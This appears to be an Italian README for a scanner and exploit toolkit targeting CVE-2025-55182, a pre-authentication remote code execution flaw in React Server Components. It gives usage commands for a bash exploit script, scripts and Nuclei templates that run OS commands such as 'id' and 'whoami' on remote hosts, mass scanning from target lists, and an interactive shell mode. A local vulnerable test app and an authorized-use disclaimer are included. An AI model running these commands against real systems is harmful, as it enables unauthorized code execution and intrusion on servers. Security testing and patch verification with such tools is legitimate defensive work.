
Toolkit di scanner ed exploit per CVE-2025-55182, un RCE critico pre-autenticazione in React Server Components. Include rilevamento, shell interattiva, distribuzione Docker e analisi tecnica educativa.
Un toolkit completo per test di sicurezza per CVE-2025-55182, una vulnerabilità critica di esecuzione remota di codice senza autenticazione in React Server Components.
Vuoi capire questa vulnerabilità al 100%?
📖 Leggi la nostra Analisi Tecnica Completa - Tutto ciò che devi sapere:
- Perché React viene eseguito sul server (non solo nel browser!)
- Come funziona l'attacco con diagrammi visivi
- Ogni riga dell'exploit spiegata
- Dai concetti base allo sfruttamento avanzato
- Nessun prerequisito richiesto!
Perfetto per: Report di sicurezza, materiali formativi, analisi delle minacce, o semplicemente per imparare!
Questa vulnerabilità riguarda le versioni di React Server Components dalla 19.0.0 alla 19.2.0, interessando:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpackImpatto: Attaccanti non autenticati possono eseguire codice arbitrario da remoto tramite deserializzazione non sicura dei payload delle richieste HTTP verso gli endpoint delle Server Function.
👉 Leggi l'Analisi Tecnica Completa - Una guida completa che copre:
Perfetto per:
Nessuna conoscenza preliminare richiesta - parte dalle basi e arriva fino alle tecniche di sfruttamento avanzate!
SOLO PER TEST DI SICUREZZA EDUCATIVI E AUTORIZZATI
Questo strumento è destinato esclusivamente a:
Avvertenza: L'accesso non autorizzato ai sistemi informatici è illegale. Gli utenti sono responsabili del rispetto di tutte le leggi e normative applicabili. Gli autori declinano ogni responsabilità per l'uso improprio di questo strumento.
Nessuna dipendenza richiesta! Singolo script bash per test rapidi.
👉 EXPLOIT_SCRIPT.md - Script autonomo che:
# Single target
./exploit-cve-2025-55182.sh http://target.com
# Multiple targets
./exploit-cve-2025-55182.sh -f targets.txt
Toolkit completo con Docker, Interfaccia Web e integrazione Nuclei. Continua a leggere per l'installazione.
| Funzionalità | Descrizione |
|---|---|
| 🐳 Supporto Docker | Distribuzione con un comando tramite Docker Compose |
| 🌐 Interfaccia Web | Interfaccia web user-friendly per utenti non tecnici |
| 🔍 Ambiente di Test Vulnerabile | Avvia un'app vulnerabile locale per test sicuri |
| 🎯 Scansione Remota | Testa target esterni per vulnerabilità |
| ⚡ Shell Interattiva | Esegui comandi del sistema operativo e vedi i risultati in tempo reale |
| 📊 Modalità di Scansione Multiple | Solo rilevamento o sfruttamento completo |
| 📝 Report Dettagliati | Formati di output JSON e testo |
| 🔧 Integrazione Nuclei | Sfrutta il potente scanner di ProjectDiscovery |
Scegli il tuo metodo di installazione:
# Clone repository
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Start scanner
docker compose up
# Access web interface at http://localhost:3001
# Clone repository
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Install Nuclei (macOS)
brew install nuclei
# Make scripts executable
chmod +x scripts/*.sh
📖 Configurazione Dettagliata: Vedi SETUP_GUIDE.md per istruzioni passo-passo
⚡ Riferimento Rapido: Vedi QUICKSTART.md per casi d'uso comuni
Avvia l'Interfaccia Web:
docker compose up
# Open browser: http://localhost:3001
Avvia con App di Test Vulnerabile:
docker compose --profile with-vulnerable-app up
# Scanner: http://localhost:3001
# Vulnerable app: http://localhost:3000
Importante per utenti Docker: Quando si esegue la scansione da Docker, usa:
http://host.docker.internal:3000 per scansionare app sulla tua macchina hosthttp://vulnerable-app:3000 per scansionare l'app vulnerabile containerizzatahttps://example.com per target esternihttp://localhost:3001Crea e testa un'app vulnerabile locale:
# Terminal 1: Start vulnerable app
./scripts/setup-vulnerable-app.sh
# App will run on http://localhost:3000
# Terminal 2: Test it
./scripts/test-local.sh
# Execute custom commands
./scripts/test-local.sh "whoami"
./scripts/test-local.sh "pwd"
./scripts/test-local.sh "ls -la"
# Basic scan
./scripts/test-remote.sh https://target.com
# With command execution
./scripts/test-remote.sh https://target.com "id"
# Create targets file
cat > targets.txt << EOF
https://target1.com
https://target2.com
https://target3.com
EOF
# Scan all targets
./scripts/test-multiple.sh targets.txt
Rilevamento di vulnerabilità di base:
nuclei -t templates/cve-2025-55182.yaml -u http://localhost:3000 -v
Esegui comandi personalizzati:
nuclei -t templates/cve-2025-55182-interactive.yaml \
-u http://localhost:3000 \
-var cmd="whoami" \
-v
Scansiona più target:
nuclei -t templates/cve-2025-55182.yaml -l targets.txt -v